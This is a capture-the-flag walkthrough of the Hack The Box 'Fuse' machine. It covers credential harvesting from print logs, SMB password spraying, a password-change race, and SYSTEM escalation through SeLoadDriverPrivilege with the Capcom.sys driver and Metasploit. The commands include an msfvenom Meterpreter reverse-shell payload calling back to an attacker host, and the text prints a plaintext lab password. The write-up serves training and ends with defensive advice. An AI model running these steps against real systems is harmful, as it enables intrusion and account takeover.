11. Hack The Box. Level Medium: Fuse Walkthrough. RPC, Printers, and the Dangerous SeLoadDriverPrivilege Privilege

12 December 2024 4 minutes Author: Lady Liberty

This walkthrough of the Fuse machine on Hack The Box covers information gathering over RPC, mining printer data for credentials, and local privilege escalation through SeLoadDriverPrivilege.

Hack The Box: Fuse – RPC and SeLoadDriverPrivilege

This is one of a series of write-ups for retired machines from the HackTheBox platform.

The material describes building a password dictionary from indirect information about users (print logs), extracting printer data via RPC, and privilege escalation using SeLoadDriverPrivilege.

Recon

The machine is assigned the IP address 10.10.10.193, which is added to the /etc/hosts file.

10.10.10.193 fuse.htb

First, we scan all TCP ports. The script below does a fast full-range sweep, collects the open ports and then runs a detailed scan (-A) only against those.

#!/bin/bash
# $1 is the target; first pass lists open ports, second pass fingerprints them
ports=$(nmap -p- --min-rate=500 "$1" | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed 's/,$//')
nmap -p"$ports" -A "$1"

The scan reveals the domain, so we also add the machine's FQDN to /etc/hosts.

10.10.10.193    fuse.fabricorp.local

A web server is running on the host. Let's see what's there.

We are greeted by a print-logging site that lists four documents (CSV exports of print jobs). Download all four for analysis.

Since no other attack vectors are apparent, we record the usernames that appear in the logs for later use (the 2020 filter skips stale entries; the user name is the second column).

cat *.csv | grep 2020 | cut -d ',' -f 2 | sort | uniq > users.txt

We also build a candidate password list from the free-text fields of the same documents (user, document name and related columns), splitting them into single words.

cat *.csv | grep 2020 | cut -d ',' -f2,5-7 | tr -d '"' | tr '.' '\n' | tr ',' '\n' | tr -d ' ' | tr '-' '\n' | sort | uniq | tail -n+4 > pass.txt

Now we check whether any of these user/password pairs authenticate over SMB, continuing past the first hit so that every combination is tried.

cme smb 10.10.10.193 -u users.txt -p pass.txt --continue-on-success

For one user (bhult) the password is correct, but the server reports that it must be changed (STATUS_PASSWORD_MUST_CHANGE) before the account can be used.

Entry point

We change the password ourselves with smbpasswd (choosing a new one for the account).

smbpasswd -r 10.10.10.193 -U bhult

However, the new password is reset again within a few seconds, so a separate login attempt afterwards fails.

Therefore we run the two commands in a chain: rpcclient authenticates immediately after the change, and its established session stays open even after the password is reset again.

smbpasswd -r 10.10.10.193 -U bhult ; rpcclient -U bhult 10.10.10.193

We list all domain users over RPC (enumdomusers in rpcclient).

USER

Among them is an interesting service account. Given that everything on this box revolves around printers, we also enumerate the printers (enumprinters in rpcclient).

One printer's description field contains a plaintext password. We now build a list of the valid users obtained from the RPC enumeration.

Now we spray that single password across all users.

sudo cme smb 10.10.10.193 -u users.txt -p '$fab@s3Rv1ce$1' --continue-on-success

Two users accept it, among them svc-print. Connecting over WinRM as that user yields the first flag.

ROOT

Let's look at the privileges of the current user (whoami /priv).

The account holds SeLoadDriverPrivilege, which opens a vector for local privilege escalation (LPE): a user with this right can load a signed but vulnerable kernel driver and then exploit it. We need three components: the vulnerable Capcom.sys driver, the EoPLoadDriver tool to load it from a non-administrative account, and a Meterpreter payload for the Metasploit exploit module. First we generate the payload.

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.15.160 LPORT=4321 -f exe -o e.exe

Start a listener in Metasploit, upload all three files to the host and run the payload to obtain a Meterpreter session.

handler -p windows/x64/meterpreter/reverse_tcp -H 10.10.15.160 -P 4321

Now we load the driver. EoPLoadDriver registers it under the current user's registry hive (HKCU) at the given relative path and calls NtLoadDriver with that key, which is what lets a non-administrator exercise SeLoadDriverPrivilege.

.\eoploaddriver.exe System\CurrentControlSet\custom C:\Users\svc-print\Documents\Capcom.sys

Before running the Metasploit exploit for Capcom.sys, a few lines of the module have to be commented out (the exact lines are not reproduced here); the module file is:

/usr/share/metasploit-framework/modules/exploits/windows/local/capcom_sys_exec.rb

After that, we run the module against the Meterpreter session.

Successful execution of the exploit creates a new session with SYSTEM privileges, demonstrating what can happen when SeLoadDriverPrivilege is granted to an ordinary account. The defensive takeaways: this right is assigned through the "Load and unload device drivers" user right and should not be held by non-administrative accounts, and Capcom.sys is on Microsoft's vulnerable driver blocklist, so hosts that enforce the blocklist (or run HVCI) will refuse to load it.

Conclusion

This article describes the solution to the Fuse machine on HackTheBox. It covers mining printer logs and printer metadata for credentials, building a password dictionary from them, racing a forced password change, and using SeLoadDriverPrivilege to gain SYSTEM-level access. It shows how an over-granted privilege, rather than a software bug in the target itself, is enough to escalate to SYSTEM.
